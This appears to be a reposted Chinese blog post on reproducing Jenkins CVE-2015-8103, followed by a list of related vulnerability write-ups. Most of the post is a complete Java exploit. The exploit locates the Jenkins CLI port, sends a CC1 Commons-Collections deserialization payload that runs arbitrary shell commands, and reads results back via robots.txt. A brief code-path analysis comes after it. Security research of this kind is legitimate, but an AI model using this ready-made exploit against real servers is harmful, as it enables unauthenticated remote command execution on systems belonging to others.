Jenkins CVE-2015-8103 復現分析&Exp修改

阿新 • • 發佈：2021-12-13

0x00 前言

這個漏洞之前復現的時候一直不注意細節導致復現失敗。

msf遠端載入jar並反彈shell一直沒打成功，最後是通過一步步除錯poc最後寫成該漏洞利用成功的工具。

一直有幾個坑點，第一個是jdk8_111版本在linux上覆現失敗（本地打可以，不知道是不是jdk壞了），第二個點是執行復雜命令的時候一直有問題，需要sh -c最終才搞定。

0x01 漏洞利用

通過cc1鏈進行生成payload，傳送該payload即刻構成命令執行。

import com.github.kevinsawicki.http.HttpRequest;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.net.*;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;

public class JenkinsCVE_2015_8103 {
    public String getCliPort(String url){
        HttpRequest httpRequest = new HttpRequest(url,"GET");
        httpRequest.header("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36");
        httpRequest.header("Accept","*/*");
        httpRequest.header("Accept-Encoding","gzip, deflate");
        String cliPort = httpRequest.header("X-Jenkins-CLI-Port");

        //System.out.println(cliPort);
        return cliPort;
    }

    public String getIp(String urlString) throws MalformedURLException, UnknownHostException {
        InetAddress address = InetAddress.getByName(new URL(urlString).getHost());
        String ip = address.getHostAddress();
        return ip;
    }

    public String exploit(String timeStamp,String command,String host ,String port) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {


        byte[] protocol = "Protocol:CLI-connect".getBytes();
        byte[] flag = {0, 20};
        byte[] byte_3 = new byte[protocol.length + flag.length];
        System.arraycopy(flag, 0, byte_3, 0, flag.length);
        System.arraycopy(protocol, 0, byte_3, flag.length, protocol.length);
        //System.out.println(Arrays.toString(byte_3));
        int cliPort = Integer.valueOf(port);
        // 與服務端建立連線
        Socket socket = new Socket(host, cliPort);
        // 建立連線後獲得輸出流
        OutputStream outputStream = socket.getOutputStream();
        outputStream.write(byte_3);
        //通過shutdownOutput高速伺服器已經發送完資料，後續只能接受資料
        outputStream.flush();
        InputStream inputStream = socket.getInputStream();

        ByteArrayOutputStream outSteam = new ByteArrayOutputStream();
        byte[] buffer = new byte[1024];
        int len = -1;

        len = inputStream.read(buffer);
        outSteam.write(buffer, 0, len);
        len = inputStream.read(buffer);
        outSteam.write(buffer, 0, len);

        //System.out.println(Arrays.toString(outSteam.toByteArray()));

        byte[] payloadHeader = "<===[JENKINS REMOTING CAPACITY]===>".getBytes();

        byte[] payloadBody = Base64.getEncoder().encode(generatePayload(timeStamp,command));

        byte[] payload = new byte[payloadHeader.length + payloadBody.length];
        System.arraycopy(payloadHeader, 0, payload, 0, payloadHeader.length);
        System.arraycopy(payloadBody, 0, payload, payloadHeader.length, payloadBody.length);
        //System.out.println(Arrays.toString(payload));
        outputStream.write(payload);
        outputStream.flush();


        inputStream.close();
        outputStream.close();
        socket.close();
        return "";

    }

    public byte[] generatePayload(String flag,String command) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
        //System.out.println(command);

        command = flag + command;
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(java.lang.Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),
                new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{new String[]{"sh", "-c","cd $(find / -name \"winstone.jar\" -type f -exec dirname {} \\; | sed 1q) && echo `" + command + "` > robots.txt"}}),
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        Constructor constructor = Class.forName("org.apache.commons.collections.map.LazyMap").getDeclaredConstructor(Map.class, Transformer.class);
        constructor.setAccessible(true);
        HashMap hashMap = new HashMap<String, String>();
        Object lazyMap = constructor.newInstance(hashMap, chainedTransformer);

        constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        // 因為構造方法不是 public, 只能通過反射構造出來
        constructor.setAccessible(true);
        InvocationHandler invo = (InvocationHandler) constructor.newInstance(Deprecated.class, lazyMap);
        Object proxy = Proxy.newProxyInstance(invo.getClass().getClassLoader(), new Class[]{Map.class}, invo);

        constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        Object obj = constructor.newInstance(Deprecated.class, proxy);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
        oos.writeObject(obj);
        return byteArrayOutputStream.toByteArray();

    }


    public String getCmdResult(String flag,String url) throws InterruptedException {
        int all = 10;
        String result = "";
        String execResult = "";

        for(int count=0;count<all;count++){
            HttpRequest httpRequest = HttpRequest.get(url + "/robots.txt");
            result = httpRequest.body();
            //System.out.println(result);
            if(result.contains(flag)) {
                execResult = result.replaceFirst(flag, "");
                break;
            }
            TimeUnit.SECONDS.sleep(1);
        }
        if(execResult.equals("")){
            execResult = "Can not execute command";
        }

//        String result = "";
        return execResult;
    }
}

0x02 漏洞分析

從poc分析，該漏洞利用主要分為幾步，首先是獲得Cli埠，cli埠一般為隨機埠

接著去請求cli埠

第一步是client傳送類似於Protocol:CLI-connect的握手協議，接著服務端返回Welcome，接著再度返回<==Jenkins這些標記，最後接上經過base64編碼的序列化字串。

從程式碼層面來看，該cli埠業務處理邏輯入口為TcpSlaveAgentListener

其呼叫ConnectionHandler方法，直接判斷Protocol協議是否符合預期

run方法中呼叫handle方法，在接收後返回Welcome

跟進runCli

通過鏈式呼叫，最終呼叫build方法，其中build方法傳入為輸入和輸出

方法最後呼叫negotiate，對client傳過來的資料進行反序列化，以及講序列化的資料傳給客戶端

該read方法的內部構造呼叫了readObject

通過呼叫readObject進行反序列化，反序列化使用的是cc1鏈的payload，於是會通過呼叫AnnotationInvocationHandler進行去呼叫CommonsCollections的鏈式呼叫，從而執行命令。

0x0 參考

https://www.kingkk.com/2019/01/Java反序列之從萌新到菜鳥/

https://xz.aliyun.com/t/7157

https://xz.aliyun.com/t/7740

https://misakikata.github.io/2020/03/Jenkins漏洞集合復現

Jenkins CVE-2015-8103 復現分析&Exp修改

0x00 前言這個漏洞之前復現的時候一直不注意細節導致復現失敗。 msf遠端載入jar並反彈shell一直沒打成功，最後是通過一步步除錯poc最後寫成該漏洞利用成功的工具。

記一次曲折的CVE-2018-1270復現分析

　前言　前兩天接到朋友對某個授權目標的漏掃結果，也算是初次接觸到這個漏洞，就想著順手分析一下復現一下，因為分析這個漏洞的文章也比較少，所以剛開始比較迷，進度也比較慢。

oracle 7月份更新 CVE-2020-14625 復現&利用

diff補丁首先下載7月份補丁，與四月份對比，發現有以下不同之處 com.oracle.wls.shaded.org.apache.xalan.xsltc.trax

oracle 7月份更新CVE-2020-14645 復現&利用

簡介該漏洞針對gadget cve-2020-2555 繞過利用。分析 com.tangosol.util.extractor.UniversalExtractor程式碼如下

Apache Dubbo反序列化漏洞（CVE-2019-17564）復現分析

漏洞描述 Apache Dubbo是一款高效能Java RPC框架，核心功能是方便麵向介面的遠端過程呼叫，叢集容錯和負載均衡，以及服務自動註冊與發現。

ActiveMQ反序列化漏洞（CVE-2015-5254）復現

ActiveMQ反序列化漏洞（CVE-2015-5254）復現導語 Apache ActiveMQ是美國阿帕奇（Apache）軟體基金會所研發的一套開源的訊息中介軟體，它支援Java訊息服務、叢集、Spring Framework等。

漏洞復現-CVE-2015-5531-ElasticSearch 目錄穿越

0x00 實驗環境攻擊機：Win 10 靶場：docker拉的vulhub靶場 0x01 影響版本 1.6.1以下 0x02 漏洞復現

Gitlab CVE-2018-14364 壓縮包上傳getshell 漏洞復現分析

0x00 前言該漏洞屬於登入後的任意檔案寫入漏洞，該漏洞可以通過寫入公鑰復現該漏洞需要注意版本問題，一開始用vulhub起的環境發現復現不了，於是到網上找了一個docker映象搭建起來才復現成功。

IE 11瀏覽器0day漏洞（CVE-2015-2425）UAF分析

前言 CVE-2015-2425是Hacking team洩露出來的一個IE11的0day漏洞，影響了IE11及之前的版本。在一封Hacking Team高層收到的來自Vectra Networks安全公司的信件中被發現。Vectra Networks公司的研究者在信中向Hacking

原創｜sonar+Jenkins 構建程式碼質量自動化分析平臺

1.Sonar 介紹 Sonar 是一個用於管理程式碼質量的開源工具，可以分析程式碼中的bug和漏洞以及Code Smells，支援20多種程式語言的檢測，如java，c/c++，python，php等語言，當前有超過85000家組織在使用sonar。Sonar

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架，提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用，同時也能提供健壯的安全性。

F5 BIG-IP 遠端程式碼執行RCE(CVE-2020-5902)復現

漏洞簡介 F5 BIG-IP 是美國``F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Dubbo 漏洞 CVE-2020-1948 復現+簡單修復

關注該漏洞的童鞋，應該對 Dubbo 這個架構優秀的 RPC 框架不陌生，所以直入主題

CVE-2018-1000861復現

0x00 漏洞描述 Jenkins使用Stapler框架開發，其允許使用者通過URL PATH來呼叫一次public方法。由於這個過程沒有做限制，攻擊者可以構造一些特殊的PATH來執行一些敏感的Java方法。

（CVE-2015-1328）Ubuntu Linux核心本地提權漏洞

（CVE-2015-1328）Ubuntu Linux核心本地提權漏洞一、漏洞簡介本地普通使用者可以利用該漏洞在敏感系統目錄中建立新檔案或讀取敏感檔案內容，從而提升到管理員許可權。

jenkins + sonar程式碼質量自動化分析平臺

1.Sonar介紹 Sonar 是一個用於管理程式碼質量的開源工具，可以分析程式碼中的bug和漏洞以及Code Smells，支援20多種程式語言的檢測，如java，c/c++，python，php等語言，當前有超過85000家組織在使用sonar。Sonar可

機器學習（3）高斯判別分析&樸素貝葉斯分類器

判別模型與生成模型判別模型判別模型是對觀測資料進行直接分類，常見的判別模型有邏輯迴歸和感知機演算法等。此模型僅對資料進行分類，並不能具象化或者量化資料本身的分佈狀態，因此也無法根據分類生成可

iOS進階_KVC（&KVC賦值取值過程分析&KVC自定義&異常處理）

KVC（Key-value coding）鍵值編碼基本使用能夠對物件的私有成員進行取值賦值對數值和結構體型的屬性進行的打包解包處理

34、最簡單的mvc框架tiny，總結分析&V2版思路

2019獨角獸企業重金招聘Python工程師標準>>> 總結一下目前tiny的問題前面已經說了2個：1、TinyMap和2、aop，TinyMap的思路我覺得挺好的，但是TinyMap類實現有點簡單粗糙，需要增強。

效能測試-效能指標的分析 & 定義

目錄結構一、效能測試需求分析與定義 1.效能需求關注的常規量化指標項 2.分析確定業務測試點，提取效能指標的策略

Jenkins CVE-2015-8103 復現分析&Exp修改

0x00 前言

0x01 漏洞利用

0x02 漏洞分析

0x0 參考

相關推薦